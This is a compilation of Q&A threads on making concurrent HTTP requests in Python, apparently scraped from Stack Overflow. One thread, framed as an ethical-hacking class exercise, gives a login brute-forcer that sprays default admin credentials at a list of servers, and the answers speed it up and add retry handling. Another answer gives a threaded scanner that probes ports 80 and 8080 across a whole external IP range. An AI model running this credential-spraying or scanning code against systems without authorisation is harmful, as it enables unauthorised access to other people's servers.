I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in number to several thousand.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stackoverflow (Specifically, What is the fastest way to send 100,000 HTTP requests in Python? ), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
One additional issue that I'm facing is that the keyboard interrup method never fires (I'm trying with Ctrl+C but it does not kill the script.
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue
requestURLBase = "https://example.com/api"
apiKey = "123456"
concurrent = 200
keepTrying = 1
def doWork():
while keepTrying == 1:
url = q.get()
status, body, url = checkStatus(url)
checkResult(status, body, url)
q.task_done()
def checkStatus(ourl):
try:
url = urlparse(ourl)
conn = httplib.HTTPConnection(requestURLBase)
conn.request("GET", url.path)
res = conn.getresponse()
respBody = res.read()
conn.close()
return res.status, respBody, ourl #Status can be 210 for error or 300 for successful API response
except:
print "ErrorBlock"
print res.read()
conn.close()
return "error", "error", ourl
def checkResult(status, body, url):
if "unavailable" not in body:
print status, body, url
keepTrying = 1
else:
keepTrying = 0
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
except KeyboardInterrupt:
sys.exit(1)
I'm new to Python so there could be syntax errors as well... I'm definitely not familiar with multi-threading so perhaps I'm doing something else wrong as well.
In the code, the list is only read once. Should be something like
try:
while True:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
For the interrupt thing, remove the bare except line in checkStatus or make it except Exception. Bare excepts will catch all exceptions, including SystemExit which is what sys.exit raises and stop the python process from terminating.
If I may make a couple comments in general though.
Threading is not a good implementation for such large concurrencies
Creating a new connection every time is not efficient
What I would suggest is
Use gevent for asynchronous network I/O
Pre-allocate a queue of connections same size as concurrency number and have checkStatus grab a connection object when it needs to make a call. That way the connections stay alive, get reused and there is no overhead in creating and destroying them and the increased memory use that goes with it.
Related
I am trying to make a brute forcer for my ethical hacking class using multiprocessing, I want it to iterate through the list of server IP's and try one login for each of them, but it is printing every single IP before trying to make connections, and then once all the IP's have been printed, it will start trying to make connections then print a couple IP's, then try to make another connection, and so on.
I just want it to iterate through the list of IP's and try to connect to each one, one process for each connection and try about 20 processes at a time
import threading, requests, time, os, multiprocessing
global count2
login_list=[{"username":"admin","password":"Password1"}]
with open('Servers.txt') as f:
lines = [line.rstrip() for line in f]
count=[]
for number in range(len(lines)):
count.append(number)
count2 = count
def login(n):
try:
url = 'http://'+lines[n]+'/api/auth'
print(url)
if '/#!/init/admin' in url:
print('[~] Admin panel detected, saving url and moving to next...')
x = requests.post(url, json = login_list)
if x.status_code == 422:
print('[-] Failed to connect, trying again...')
print(n)
if x.status_code == 403:
print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
time.sleep(20)
print(n)
if x.status_code == 200:
print('\n[~] Connection successful! Login to '+url+' saved.\n')
print(n)
except:
print('[#] No more logins to try for '+url+' moving to next server...')
print('--------------')
if __name__ == "__main__":
# creating a pool object
p = multiprocessing.Pool()
# map list to target function
result = p.map(login, count2)
An example of the Server.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP adresses
I think you're confused about how the subprocess map function passes values to the relevant process. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError
IPLIST = ['83.88.223.86:9000',
'75.37.144.153:9000',
'138.244.6.184:9000',
'34.228.116.82:9000',
'125.209.107.178:9000',
'33.9.12.53:9000',
'www.google.com']
PARAMS = {'username': 'admin', 'password': 'passw0rd'}
def err(msg):
print(msg, file=sys.stderr)
def process(ip):
with requests.Session() as session:
url = f'http://{ip}/api/auth'
try:
(r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
except ConnectionError:
err(f'Unable to connect to {url}')
except HTTPError:
err(f'HTTP {r.status_code} for {url}')
except Exception as e:
err(f'Unexpected exception {e}')
def main():
with Pool() as pool:
pool.map(process, IPLIST)
if __name__ == '__main__':
main()
Additional notes: You probably want to specify a timeout otherwise unreachable addresses will take a long time to process due to default retries. Review the exception handling.
The first thing I would mention is that this is a job best suited for multithreading since login is mostly waiting for network requests to complete and it is far more efficient to create threads than to create processes. In fact you should create a thread pool whose size is equal to the number of URLs you will be posting to up to a maximum of say a 1000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading your worker function, login in this case, is processing a single element of the iterable that is being passed to the map function. I think you get that. But instead of passing to map the list of servers you are passing a list of numbers (which are indices) and then login is using that index to get the information from the lines list. That is rather indirect. Also, the way you build the list of indices could have been simplified with one line: count2 = list(range(len(lines))) or really just count2 = range(len(lines)) (you don't need a list).
Third, in your code you say that you are retrying certain errors but there is actually no logic to do so.
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time
# This must be a dict not a list:
login_params = {"username": "admin", "password": "Password1"}
with open('Servers.txt') as f:
servers = [line.rstrip() for line in f]
def login(session, server):
url = f'http://{server}/api/auth'
print(url)
if '/#!/init/admin' in url:
print(f'[~] Admin panel detected, saving {url} and moving to next...')
# To move on the next, you simply return
# because you are through with this URL:
return
try:
for retry_count in range(1, 4): # will retry up to 3 times certain errors:
r = session.post(url, json=login_params)
if retry_count == 3:
# This was the last try:
break
if r.status_code == 422:
print(f'[-] Failed to connect to {url}, trying again...')
elif r.status_code == 403:
print(f'[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying {url} again in 20 seconds')
time.sleep(20)
else:
break # not something we retry
r.raise_for_status() # test status code
except Exception as e:
print('Got exception: ', e)
else:
print(f'\n[~] Connection successful! Login to {url} saved.\n')
if __name__ == "__main__":
# creating a pool object
with ThreadPool(min(len(servers), 1000)) as pool, \
requests.Session() as session:
# map will return list of None since `login` returns None implicitly:
pool.map(partial(login, session), servers)
Recently I have been working to integrate google directory, calendar and classroom to work seamlessly with the existing services that we have.
I need to loop through 1500 objects and make requests in google to check something. Responses from google does take awhile hence I want to wait on that request to complete but at the same time run other checks.
def __get_students_of_course(self, course_id, index_in_course_list, page=None):
print("getting students from gclass ", course_id, "page ", page)
# self.__check_request_count(10)
try:
response = self.class_service.courses().students().list(courseId=course_id,
pageToken=page).execute()
# the response must come back before proceeding to the next checks
course_to_add_to = self.course_list_gsuite[index_in_course_list]
current_students = course_to_add_to["students"]
for student in response["students"]:
current_students.append(student["profile"]["emailAddress"])
self.course_list_gsuite[index_in_course_list] = course_to_add_to
try:
if "nextPageToken" in response:
self.__get_students_of_course(
course_id, index_in_course_list, page=response["nextPageToken"])
else:
return
except Exception as e:
print(e)
return
except Exception as e:
print((e))
And I run that function from another function
def __check_course_state(self, course):
course_to_create = {...}
try:
g_course = next(
(g_course for g_course in self.course_list_gsuite if g_course["name"] == course_to_create["name"]), None)
if g_course != None:
index_2 = None
for index_1, class_name in enumerate(self.course_list_gsuite):
if class_name["name"] == course_to_create["name"]:
index_2 = index_1
self.__get_students_of_course(
g_course["id"], index_2) # need to wait here
students_enrolled_in_g_class = self.course_list_gsuite[index_2]["students"]
request = requests.post() # need to wait here
students_in_iras = request.json()
students_to_add_in_g_class = []
for student in students["data"]:
try:
pass
except Exception as e:
print(e)
students_to_add_in_g_class.append(
student["studentId"])
if len(students_to_add_in_g_class) != 0:
pass
else:
pass
else:
pass
except Exception as e:
print(e)
I need to these tasks for 1500 objects.
Although they are not related to each other. I want to move to the next object in the loop while it waits for the other results to come back and finish.
Here is how I tried this with threads:
def create_courses(self):
# pool = []
counter = 0
with concurrent.futures.ThreadPoolExecutor() as excecutor:
results = excecutor.map(
self.__check_course_state, self.courses[0:5])
The problem is when I run it like this I get multiple SSL errors and other errors and as far as I understand, as the threads themselves are running, the requests never wait to finish and move to the next line hence I have nothing in the request object so it throws me errors?
Any Ideas on how to approach this?
The ssl error occurs her because i was reusing the http instance from google api lib. self.class_service is being used to send a request while waiting on another request. The best way to handle this is to create instances of the service on every request.
The code in my program essentially conducts 10 python requests simultaneously and processes their output also simultaneously, it was working for a while but I changed something and can't work out what broke it.
The following code is the code that calls, the code appears to freeze between lines 3 and 4, so in the process of doing the multithreaded requests.
The line 'print("failed to close") does not print, appearing to indicate that the program does not reach the pool.close() instruction.
listoftensites = listoftensites
pool = Pool(processes=10) # Initalize a pool of 10 processes
listoftextis, listofonline = zip(*pool.map(onionrequestthreaded, listoftensites)) # Use the pool to run the function on the items in the iterable
print("failed to close ")
pool.close()
# this means that no more tasks will be added to the pool
pool.join()
The function which is called at which it hangs, is immediately after the line 'print("failed in return")', this would appear to indicate that the requests do not terminate properly and return the expected values.
def onionrequestthreaded(onionurl):
session = requests.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
onionurlforrequest = "http://" + onionurl
#print(onionurlforrequest)
print("failed with proxy session")
try:
print("failed in request")
r = session.get(onionurlforrequest, timeout=15, allow_redirects=True)
online = 2
print("failed in text extraction")
textis = r.text
except:
print("failed in except")
#print("failed")
online = 1
textis = ""
print("failed in return")
return textis, online
Very confusing but i'm probably doing something simple. Please let me know if there's a solution to this as i'm pulling my hair out.
Edit 2
Second approach. For now, I gave up on using multiple instances and configured scrapy settings not to use concurrent requests. It's slow but stable. I opened a bounty. Who can help to make this work concurrently? If I configure scrapy to run concurrently, I get segmentation faults.
class WebkitDownloader( object ):
def __init__(self):
os.environ["DISPLAY"] = ":99"
self.proxyAddress = "a:b#" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)
def process_response(self, request, response, spider):
self.request = request
self.response = response
if 'cached' not in response.flags:
webkitBrowser = webkit.WebkitBrowser(proxy = self.proxyAddress, gui=False, timeout=0.5, delay=0.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt'])
#print "added to queue: " + str(self.counter)
webkitBrowser.get(html=response.body, num_retries=0)
html = webkitBrowser.current_html()
respcls = responsetypes.from_args(headers=response.headers, url=response.url)
kwargs = dict(cls=respcls, body=killgremlins(html))
response = response.replace(**kwargs)
webkitBrowser.setPage(None)
del webkitBrowser
return response
Edit:
I tried to answer my own question in the meantime and implemented a queue but it does not run asynchronously for some reason. Basically when webkitBrowser.get(html=response.body, num_retries=0) is busy, scrapy is blocked until the method is finished. New requests are not assigned to the remaining free instances in self.queue.
Can anyone please point me into right direction to make this work?
class WebkitDownloader( object ):
def __init__(self):
proxyAddress = "http://" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)
self.queue = list()
for i in range(8):
self.queue.append(webkit.WebkitBrowser(proxy = proxyAddress, gui=True, timeout=0.5, delay=5.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt']))
def process_response(self, request, response, spider):
i = 0
for webkitBrowser in self.queue:
i += 1
if webkitBrowser.status == "WAITING":
break
webkitBrowser = self.queue[i]
if webkitBrowser.status == "WAITING":
# load webpage
print "added to queue: " + str(i)
webkitBrowser.get(html=response.body, num_retries=0)
webkitBrowser.scrapyResponse = response
while webkitBrowser.status == "PROCESSING":
print "waiting for queue: " + str(i)
if webkitBrowser.status == "DONE":
print "fetched from queue: " + str(i)
#response = webkitBrowser.scrapyResponse
html = webkitBrowser.current_html()
respcls = responsetypes.from_args(headers=response.headers, url=response.url)
kwargs = dict(cls=respcls, body=killgremlins(html))
#response = response.replace(**kwargs)
webkitBrowser.status = "WAITING"
return response
I am using WebKit in a scrapy middleware to render JavaScript. Currently, scrapy is configured to process 1 request at a time (no concurrency).
I'd like to use concurrency (e.g. 8 requests at a time) but then I need to make sure that 8 instances of WebkitBrowser() receive requests based on their individual processing state (a fresh request as soon as WebkitBrowser.get() is done and ready to receive the next request)
How would I achieve that with Python? This is my current middleware:
class WebkitDownloader( object ):
def __init__(self):
proxyAddress = "http://" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)
self.w = webkit.WebkitBrowser(proxy = proxyAddress, gui=True, timeout=0.5, delay=0.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt'])
def process_response(self, request, response, spider):
if not ".pdf" in response.url:
# load webpage
self.w.get(html=response.body, num_retries=0)
html = self.w.current_html()
respcls = responsetypes.from_args(headers=response.headers, url=response.url)
kwargs = dict(cls=respcls, body=killgremlins(html))
response = response.replace(**kwargs)
return response
I don't follow everything in your question because I don't know scrapy and I don't understand what would cause the segfault, but I think I can address one question: why is scrapy blocked when webkitBrowser.get is busy?
I don't see anything in your "queue" example that would give you the possibility of parallelism. Normally, one would use either the threading or multiprocessing module so that multiple things can run "in parallel". Instead of simply calling webkitBrowser.get, I suspect that you may want to run it in a thread. Retrieving web pages is a case where python threading should work reasonably well. Python can't do two CPU-intensive tasks simultaneously (due to the GIL), but it can wait for responses from web servers in parallel.
Here's a recent SO Q/A with example code that might help.
Here's an idea of how to get you started. Create a Queue. Define a function which takes this queue as an argument, get's the web page and puts the response in the queue. In the main program, enter a while True: loop after spawning all the get threads: check the queue and process the next entry, or time.sleep(.1) if it's empty.
I am aware this is an old question, but I had the similar question and hope this information I stumbled upon helps others with this similar question:
If scrapyjs + splash works for you (given you are using a webkit browser, they likely do, as splash is webkit-based), it is probably the easiest solution;
If 1 does not work, you may be able to run multiple spiders at the same time with scrapyd or do multiprocessing with scrapy;
Depending on wether your browser render is primarily waiting (for pages to render), IO intensive or CPU-intensive, you may want to use non-blocking sleep with twisted, multithreading or multiprocessing. For the latter, the value of sticking with scrapy diminishes and you may want to hack a simple scraper (e.g. the web crawler authored by A. Jesse Jiryu Davis and Guido van Rossum: code and document) or create your own.
learning python here, I want to check if anybody is running a web server on my local
network, using this code, but it gives me a lot of error in the concole.
#!/usr/bin/env python
import httplib
last = 1
while last <> 255:
url = "10.1.1." + "last"
connection = httplib.HTTPConnection("url", 80)
connection.request("GET","/")
response = connection.getresponse()
print (response.status)
last = last + 1
I do suggest changing the while loop to the more idiomatic for loop, and handling exceptions:
#!/usr/bin/env python
import httplib
import socket
for i in range(1, 256):
try:
url = "10.1.1.%d" % i
connection = httplib.HTTPConnection(url, 80)
connection.request("GET","/")
response = connection.getresponse()
print url + ":", response.status
except socket.error:
print url + ":", "error!"
To see how to add a timeout to this, so it doesn't take so long to check each server, see here.
as pointed out, you have some basic
quotation issues. but more fundamentally:
you're not using Pythonesque
constructs to handle things but
you're coding them as simple
imperative code. that's fine, of course, but below are examples of funner (and better) ways to express things
you need to explicitly set timeouts or it'll
take forever
you need to multithread or it'll take forever
you need to handle various common exception types or your code will crash: connections will fail (including
time out) under numerous conditions
against real web servers
10.1.1.* is only one possible set of "local" servers. RFC 1918 spells out that
the "local" ranges are 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255, and
192.168.0.0 - 192.168.255.255. the problem of
generic detection of responders in
your "local" network is a hard one
web servers (especially local
ones) often run on other ports than
80 (notably on 8000, 8001, or 8080)
the complexity of general
web servers, dns, etc is such that
you can get various timeout
behaviors at different times (and affected by recent operations)
below, some sample code to get you started, that pretty much addresses all of
the above problems except (5), which i'll assume is (well) beyond
the scope of the question.
btw i'm printing the size of the returned web page, since it's a simple
"signature" of what the page is. the sample IPs return various Yahoo
assets.
import urllib
import threading
import socket
def t_run(thread_list, chunks):
t_count = len(thread_list)
print "Running %s jobs in groups of %s threads" % (t_count, chunks)
for x in range(t_count / chunks + 1):
i = x * chunks
i_c = min(i + chunks, t_count)
c = len([t.start() for t in thread_list[i:i_c]])
print "Started %s threads for jobs %s...%s" % (c, i, i_c - 1)
c = len([t.join() for t in thread_list[i:i_c]])
print "Finished %s threads for job index %s" % (c, i)
def url_scan(ip_base, timeout=5):
socket.setdefaulttimeout(timeout)
def f(url):
# print "-- Trying (%s)" % url
try:
# the print will only complete if there's a server there
r = urllib.urlopen(url)
if r:
print "## (%s) got %s bytes" % (url, len(r.read()))
else:
print "## (%s) failed to connect" % url
except IOError, msg:
# these are just the common cases
if str(msg)=="[Errno socket error] timed out":
return
if str(msg)=="[Errno socket error] (10061, 'Connection refused')":
return
print "## (%s) got error '%s'" % (url, msg)
# you might want 8000 and 8001, too
return [threading.Thread(target=f,
args=("http://" + ip_base + str(x) + ":" + str(p),))
for x in range(255) for p in [80, 8080]]
# run them (increase chunk size depending on your memory)
# also, try different timeouts
t_run(url_scan("209.131.36."), 100)
t_run(url_scan("209.131.36.", 30), 100)
Remove the quotes from the variable names last and url. Python is interpreting them as strings rather than variables. Try this:
#!/usr/bin/env python
import httplib
last = 1
while last <> 255:
url = "10.1.1.%d" % last
connection = httplib.HTTPConnection(url, 80)
connection.request("GET","/")
response = connection.getresponse()
print (response.status)
last = last + 1
You're trying to connect to an url that is literally the string 'url': that's what the quotes you're using in
connection = httplib.HTTPConnection("url", 80)
mean. Once you remedy that (by removing those quotes) you'll be trying to connect to "10.1.1.last", given the quotes in the previous line. Set that line to
url = "10.1.1." + str(last)
and it could work!-)